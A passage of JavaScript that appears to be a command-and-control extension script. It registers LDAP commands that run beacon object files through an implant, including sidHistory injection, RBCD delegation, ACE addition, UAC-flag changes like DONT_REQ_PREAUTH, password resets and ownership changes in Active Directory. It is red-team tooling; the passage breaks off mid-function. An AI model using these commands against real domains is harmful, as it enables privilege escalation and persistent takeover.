_cmd_getattribute.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getattribute.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getattribute.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let attributes = parsed_json["attributes"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, attributes, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-attribute." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Querying ${attributes} for ${target}...`);
});



var _cmd_getspn = ax.create_command(
    "get-spn",
    "Get SPNs for an object",
    "ldap get-spn machine01$ -ou \"OU=Computers,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_getspn.addArgString("target", true, "Object name or DN");
_cmd_getspn.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_getspn.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getspn.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getspn.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,int", [target, is_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-spn." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Querying SPNs for ${target}...`);
});



var _cmd_getacl = ax.create_command(
    "get-acl",
    "Get ACL/security descriptor for an object",
    "ldap get-acl jane.doe -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local --resolve"
);
_cmd_getacl.addArgString("target", true, "Object name or DN");
_cmd_getacl.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_getacl.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getacl.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getacl.addArgBool("--resolve", "Resolve SID names");
_cmd_getacl.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;
    let resolve = parsed_json["--resolve"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,int,int", [target, is_dn, ou_path, dc_fqdn, use_ldaps, resolve]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-acl." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Querying ACL for ${target}...`);
});



var _cmd_getrbcd = ax.create_command(
    "get-rbcd",
    "Get RBCD configuration for an object",
    "ldap get-rbcd somecomputer$ -ou \"OU=Computers,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_getrbcd.addArgString("target", true, "Object name or DN");
_cmd_getrbcd.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_getrbcd.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getrbcd.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getrbcd.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,int", [target, is_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-rbcd." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Querying RBCD for ${target}...`);
});



// ============================================================================
// ADD COMMANDS
// ============================================================================

var _cmd_adduser = ax.create_command(
    "add-user",
    "Add a user to the domain",
    "ldap add-user jane.doe 'P@ssw0rd!' -fn Jane -ln Doe -email jane.doe@domain.local -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_adduser.addArgString("username", true, "Username or DN");
_cmd_adduser.addArgString("password", true, "Password for the user");
_cmd_adduser.addArgFlagString("-fn", "firstname", false, "First name");
_cmd_adduser.addArgFlagString("-ln", "lastname", false, "Last name");
_cmd_adduser.addArgFlagString("-email", "email", false, "Email address");
_cmd_adduser.addArgBool("--disabled", "Create account disabled");
_cmd_adduser.addArgFlagString("-ou", "ou_path", false, "Target OU path");
_cmd_adduser.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_adduser.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_adduser.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let username = parsed_json["username"];
    let is_dn = identifyInputType(username);
    let password = parsed_json["password"];
    let firstname = parsed_json["firstname"] || "";
    let lastname = parsed_json["lastname"] || "";
    let email = parsed_json["email"] || "";
    let disabled = parsed_json["--disabled"] ? 1 : 0;
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = 1; // Always use LDAPS for password operations

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,cstr,int,cstr,cstr,int",
        [username, is_dn, password, firstname, lastname, email, disabled, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-user." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding user ${username}...`);
});


var _cmd_addcomputer = ax.create_command(
    "add-computer",
    "Add a computer to the domain",
    "ldap add-computer WORKSTATION01 -p 'P@ssw0rd!' -ou \"OU=Computers,DC=domain,DC=local\" -dc dc01.domain.local --ldaps"
);
_cmd_addcomputer.addArgString("computer", true, "Computer name or DN");
_cmd_addcomputer.addArgFlagString("-p", "password", false, "Password for the computer");
_cmd_addcomputer.addArgFlagString("-ou", "ou_path", false, "Target OU path");
_cmd_addcomputer.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addcomputer.addArgBool("--disabled", "Create account disabled");
_cmd_addcomputer.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addcomputer.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let computer = parsed_json["computer"];
    let is_dn = identifyInputType(computer);
    let password = parsed_json["password"] || "";
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let disabled = parsed_json["--disabled"] ? 1 : 0;
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;
    if (password) use_ldaps = 1;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int,int",
        [computer, is_dn, password, ou_path, dc_fqdn, disabled, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-computer." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding computer ${computer}...`);
});



var _cmd_addgroup = ax.create_command(
    "add-group",
    "Add a group to the domain",
    "ldap add-group Stark -desc \"House Stark\" -scope global -ou \"OU=Groups,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_addgroup.addArgString("groupname", true, "Group name or DN");
_cmd_addgroup.addArgFlagString("-desc", "description", false, "Group description");
_cmd_addgroup.addArgFlagString("-type", "type", false, "Group type: security or distribution");
_cmd_addgroup.addArgFlagString("-scope", "scope", false, "Group scope: global, domainlocal, or universal");
_cmd_addgroup.addArgFlagString("-ou", "ou_path", false, "Target OU path");
_cmd_addgroup.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addgroup.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addgroup.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let groupname = parsed_json["groupname"];
    let is_dn = identifyInputType(groupname);
    let description = parsed_json["description"] || "";
    let type = parsed_json["type"] || "";
    let scope = parsed_json["scope"] || "";
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,cstr,cstr,int",
        [groupname, is_dn, description, type, scope, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-group." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding group ${groupname}...`);
});



var _cmd_addgroupmember = ax.create_command(
    "add-groupmember",
    "Add a member to a group",
    "ldap add-groupmember Stark jane.doe -ou \"OU=Groups,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_addgroupmember.addArgString("group", true, "Group name or DN");
_cmd_addgroupmember.addArgString("member", true, "Member name or DN");
_cmd_addgroupmember.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addgroupmember.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addgroupmember.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addgroupmember.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let group = parsed_json["group"];
    let is_group_dn = identifyInputType(group);
    let member = parsed_json["member"];
    let is_member_dn = identifyInputType(member);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int",
        [group, is_group_dn, member, is_member_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-groupmember." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding ${member} to ${group}...`);
});



var _cmd_addou = ax.create_command(
    "add-ou",
    "Add an organizational unit",
    "ldap add-ou 'OU=Research,DC=domain,DC=local' -desc \"Research OU\" -dc dc01.domain.local"
);
_cmd_addou.addArgString("ou_name", true, "OU name or DN");
_cmd_addou.addArgFlagString("-desc", "description", false, "OU description");
_cmd_addou.addArgFlagString("-parent", "parent_ou", false, "Parent OU DN");
_cmd_addou.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addou.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addou.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let ou_name = parsed_json["ou_name"];
    let is_dn = identifyInputType(ou_name);
    let description = parsed_json["description"] || "";
    let parent_ou = parsed_json["parent_ou"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int",
        [ou_name, is_dn, description, parent_ou, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-ou." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding OU ${ou_name}...`);
});



var _cmd_addsidhistory = ax.create_command(
    "add-sidhistory",
    "Add a SID to an object's sidHistory attribute",
    "ldap add-sidhistory jane.doe S-1-5-21-123456789-123456789-123456789-500 -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_addsidhistory.addArgString("target", true, "Target object name or DN");
_cmd_addsidhistory.addArgString("sid_source", true, "SID string (S-1-5-...), username, or DN to copy SID from");
_cmd_addsidhistory.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addsidhistory.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addsidhistory.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addsidhistory.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_target_dn = identifyInputType(target);
    let sid_source = parsed_json["sid_source"];
    let is_sid_source_dn = identifyInputType(sid_source);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;
    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int",
        [target, is_target_dn, sid_source, is_sid_source_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-sidhistory." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding SID to ${target}'s sidHistory...`);
});



var _cmd_addspn = ax.create_command(
    "add-spn",
    "Add an SPN to a object",
    "ldap add-spn machine01 HOST/machine01.domain.local -ou \"OU=Computers,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_addspn.addArgString("target", true, "Object name or DN");
_cmd_addspn.addArgString("spn", true, "SPN to add");
_cmd_addspn.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addspn.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addspn.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addspn.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let spn = parsed_json["spn"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, spn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-spn." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding SPN ${spn} to ${target}...`);
});



var _cmd_addattribute = ax.create_command(
    "add-attribute",
    "Add a value to an attribute",
    "ldap add-attribute jane.doe description 'File not found' -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_addattribute.addArgString("target", true, "Object name or DN");
_cmd_addattribute.addArgString("attribute", true, "Attribute name");
_cmd_addattribute.addArgString("value", true, "Value to add");
_cmd_addattribute.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addattribute.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addattribute.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addattribute.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let attribute = parsed_json["attribute"];
    let value = parsed_json["value"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,cstr,int",
        [target, is_dn, attribute, value, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-attribute." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding ${attribute} value to ${target}...`);
});



var _cmd_adduac = ax.create_command(
    "add-uac",
    "Add UAC flags to an object",
    "ldap add-uac jane.doe TRUSTED_FOR_DELEGATION -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_adduac.addArgString("target", true, "Object name or DN");
_cmd_adduac.addArgString("flags", true, "Comma-separated UAC flags (e.g., DONT_REQ_PREAUTH,DONT_EXPIRE_PASSWD)");
_cmd_adduac.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_adduac.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_adduac.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_adduac.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let flags = parsed_json["flags"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, flags, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-uac." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding UAC flags to ${target}...`);
});



var _cmd_adddelegation = ax.create_command(
    "add-delegation",
    "Add a delegation SPN to an object",
    "ldap add-delegation machine01 RestrictedKrbHost/machine01.domain.local -ou \"OU=Computers,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_adddelegation.addArgString("target", true, "Object name or DN");
_cmd_adddelegation.addArgString("spn", true, "Delegation SPN to add");
_cmd_adddelegation.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_adddelegation.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_adddelegation.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_adddelegation.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let spn = parsed_json["spn"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, spn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-delegation." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding delegation SPN to ${target}...`);
});



var _cmd_addace = ax.create_command(
    "add-ace",
    "Add an ACE to an object's DACL",
    "ldap add-ace CN=SomeObject,OU=Data,DC=domain,DC=local jane.doe WRITE -dc dc01.domain.local"
);
_cmd_addace.addArgString("target", true, "Target object name or DN");
_cmd_addace.addArgString("trustee", true, "Trustee name or DN");
_cmd_addace.addArgString("rights", true, "Access rights (e.g., GenericAll, WriteDacl)");
_cmd_addace.addArgFlagString("-type", "ace_type", false, "ACE type: allow (default), deny");
_cmd_addace.addArgFlagString("-flags", "flags", false, "ACE inheritance flags (e.g., CI,OI)");
_cmd_addace.addArgFlagString("-guid", "guid", false, "Object type GUID");
_cmd_addace.addArgFlagString("-inherit-guid", "inherit_guid", false, "Inherited object type GUID");
_cmd_addace.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addace.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addace.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addace.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_target_dn = identifyInputType(target);
    let trustee = parsed_json["trustee"];
    let is_trustee_dn = identifyInputType(trustee);
    let rights = parsed_json["rights"];
    let ace_type = parsed_json["ace_type"] || "";
    let flags = parsed_json["flags"] || "";
    let guid = parsed_json["guid"] || "";
    let inherit_guid = parsed_json["inherit_guid"] || "";
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,cstr,cstr,cstr,cstr,cstr,int",
        [target, is_target_dn, trustee, is_trustee_dn, rights, ace_type, flags, guid, inherit_guid, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-ace." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding ACE to ${target}...`);
});



var _cmd_addrbcd = ax.create_command(
    "add-rbcd",
    "Add an RBCD delegation",
    "ldap add-rbcd targetComputer$ principalAccount$ -ou \"OU=Computers,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_addrbcd.addArgString("target", true, "Target object name or DN");
_cmd_addrbcd.addArgString("delegate", true, "Object allowed to delegate");
_cmd_addrbcd.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_addrbcd.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_addrbcd.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_addrbcd.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_target_dn = identifyInputType(target);
    let delegate = parsed_json["delegate"];
    let is_delegate_dn = identifyInputType(delegate);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,int,cstr,cstr,int",
        [target, is_target_dn, delegate, is_delegate_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/add-rbcd." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Adding RBCD delegation to ${target}...`);
});



// ============================================================================
// SET COMMANDS
// ============================================================================

var _cmd_setpassword = ax.create_command(
    "set-password",
    "Set/reset a user's password",
    "ldap set-password jane.doe 'N3wP@ssw0rd!' -old 'OldP@ss' -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_setpassword.addArgString("target", true, "User name or DN");
_cmd_setpassword.addArgString("password", true, "New password");
_cmd_setpassword.addArgFlagString("-old", "old_password", false, "Old password (required for self-service password change, omit for admin reset)");
_cmd_setpassword.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_setpassword.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_setpassword.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let password = parsed_json["password"];
    let old_password = parsed_json["old_password"] || "";
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = 1; // Always use LDAPS for password operations

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,cstr,int", [target, is_dn, password, old_password, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/set-password." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Setting password for ${target}...`);
});



var _cmd_setspn = ax.create_command(
    "set-spn",
    "Set/replace all SPNs on an object",
    "ldap set-spn machine01$ HOST/machine01.domain.local -dc dc01.domain.local --ldaps"
);
_cmd_setspn.addArgString("target", true, "Object name or DN");
_cmd_setspn.addArgString("spn", true, "SPN to set (replaces all existing)");
_cmd_setspn.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_setspn.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_setspn.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_setspn.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let spn = parsed_json["spn"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, spn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/set-spn." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Setting SPN on ${target}...`);
});



var _cmd_setdelegation = ax.create_command(
    "set-delegation",
    "Set/replace delegation SPNs",
    "ldap set-delegation appsvc RestrictedKrbHost/appsvc.domain.local -dc dc01.domain.local --ldaps"
);
_cmd_setdelegation.addArgString("target", true, "Object name or DN");
_cmd_setdelegation.addArgString("spn", true, "Delegation SPN (replaces all existing)");
_cmd_setdelegation.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_setdelegation.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_setdelegation.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_setdelegation.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let spn = parsed_json["spn"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, spn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/set-delegation." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Setting delegation on ${target}...`);
});



var _cmd_setattribute = ax.create_command(
    "set-attribute",
    "Set/replace an attribute value",
    "ldap set-attribute jane.doe description 'File found' -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_setattribute.addArgString("target", true, "Object name or DN");
_cmd_setattribute.addArgString("attribute", true, "Attribute name");
_cmd_setattribute.addArgString("value", true, "Value to set");
_cmd_setattribute.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_setattribute.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_setattribute.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_setattribute.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let attribute = parsed_json["attribute"];
    let value = parsed_json["value"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,cstr,int",
        [target, is_dn, attribute, value, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/set-attribute." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Setting ${attribute} on ${target}...`);
});



var _cmd_setuac = ax.create_command(
    "set-uac",
    "Set UAC flags (replaces all)",
    "ldap set-uac jane.doe DONT_EXPIRE_PASSWD -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_setuac.addArgString("target", true, "Object name or DN");
_cmd_setuac.addArgString("flags", true, "Comma-separated UAC flags (replaces all): SCRIPT, ACCOUNTDISABLE, HOMEDIR_REQUIRED, LOCKOUT, PASSWD_NOTREQD, PASSWD_CANT_CHANGE, NORMAL_ACCOUNT, INTERDOMAIN_TRUST_ACCOUNT, WORKSTATION_TRUST_ACCOUNT" +
    "SERVER_TRUST_ACCOUNT, DONT_EXPIRE_PASSWD, SMARTCARD_REQUIRED, TRUSTED_FOR_DELEGATION, NOT_DELEGATED, USE_DES_KEY_ONLY, DONT_REQ_PREAUTH, PASSWORD_EXPIRED, TRUSTED_TO_AUTH_FOR_DELEGATION, NO_AUTH_DATA_REQUIRED");
_cmd_setuac.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_setuac.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_setuac.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_setuac.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let flags = parsed_json["flags"];
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,cstr,int", [target, is_dn, flags, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/set-uac." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Setting UAC flags on ${target}...`);
});



var _cmd_setowner = ax.create_command(
    "set-owner",
    "Set the owner of an object (requires WriteOwner)",
    "ldap set-owner cn=resource,ou=apps,dc=domain,dc=local cn=jane.doe,ou=Users,dc=domain,dc=local -dc dc01.domain.local"
);
_cmd_setowner.addArgString("target", true, "Target object name or DN");
_cmd_setowner.addArgString("owner", true, "New owner name or DN");
_cmd_setowner.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_setowner.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_setowner.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_setowner.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_target_dn = identifyInputType(target);
    let owner = parsed_json["owner"];
    let is_owner_dn = identifyInputType(owner);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
